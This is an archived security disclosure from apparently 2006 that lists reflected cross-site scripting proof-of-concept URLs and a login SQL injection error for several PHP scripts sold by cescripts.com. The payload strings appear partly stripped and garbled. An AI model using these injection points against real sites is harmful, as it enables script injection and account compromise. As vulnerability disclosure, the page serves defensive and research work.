TUCoPS :: Web :: Specific Sites :: b06-2919.htm

cescripts.com - XSS
cescripts.com - XSS
cescripts.com - XSS



Cescripts.com Scripts=0D
=0D
Below are scripts I tested from the site cescripts.com. This site seels to be selling canned scripts, full of errors. Anyways, take a look:=0D
=0D
Car Classifieds=0D
=0D
Homepage:=0D
http://www.cescripts.com/=0D 
=0D
effected files:=0D
index.php=0D
=0D
XSS Vulnerabilities PoC:=0D
=0D
Viewing a car:=0D
'>=0D">http://www.example.com/car_classifieds/listings/index.php?pag=car_view&car_id=32&offset=0&ord=1&make_id=63'>">'>=0D 
=0D
The Car listings:=0D
'>=0D">http://www.example.com/car_classifieds/listings/index.php?pag=car_list&ord=1&make_id=63'>">'>=0D 
=0D
=0D
Screenshots:=0D
=0D
http://www.youfucktard.com/xsp/car1.jpg=0D 
http://www.youfucktard.com/xsp/car2.jpg=0D 
http://www.youfucktard.com/xsp/car3.jpg=0D 
http://www.youfucktard.com/xsp/car4.jpg=0D 
--------------------------------------------------=0D
=0D
Event Registration ALL VERSIONS=0D
=0D
Effected files:=0D
view-event-details.php=0D
event-registration.php=0D
=0D
view-event-details.php XSS Vuln:=0D
=0D
'>=0D">http://www.example.com/rsvp3/view-event-details.php?event_id=74'>">'>=0D 
=0D
Event-registration-details.php XSS Vuln:=0D
'>&submit=Register=0D">http://www.example.com/rsvp3/event-registration.php?select_events=74'>">'>&submit=Register=0D 
=0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/event1.jpg=0D 
http://www.youfucktard.com/xsp/event2.jpg=0D 
=0D
------------------------------------------------=0D
Fast Menu Restaurant Ordering v1.0=0D
=0D
Effected files:=0D
index.php=0D
=0D
XSS Vuln PoC on sel_menu variable:=0D
'>=0D">http://www.example.com/fastmenu/index.php?pag=gift_certificate&sel_menu=5'>">'>=0D 
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/frest1.jpg=0D 
http://www.youfucktard.com/xsp/frest2.jpg=0D 
=0D
DB Query error msg upon using sql injection of ' to log in:=0D
=0D
Error:db::query() failed.ERROR MESSAGE IS: Failed to run Query:SELECT member_id, first_name, last_name FROM member WHERE password='\\'\\'' AND username='\\'\\'' You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' AND username='\\'\\''' at line 3 =0D
=0D
-------------------------------------------------=0D
=0D
Home Rental Script ALL VERSIONS=0D
=0D
Effected files:=0D
index.php=0D
=0D
XSS Vuln via sel_menu variable:=0D
This has got to be the worst i've seen yet of this kind. The text is everywhere! I think I counted about 20 popups, no joke. =0D
=0D
'>=0D">http://www.example.com/home_rental/index.php?pag=list_properties&act=basket-add&id=17&type=room&ofs=0&day=11&month=6&year=2006&night=1&hotel_id=&show=&sel_menu='>">'>=0D 
=0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/cereal1.jpg=0D 
http://www.youfucktard.com/xsp/cereal2.jpg=0D 
http://www.youfucktard.com/xsp/cereal3.jpg=0D 
=0D
---------------------------------------------------=0D
=0D
There were a ton of other scripts on the site, but I got tired of testing canned scripts =(

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH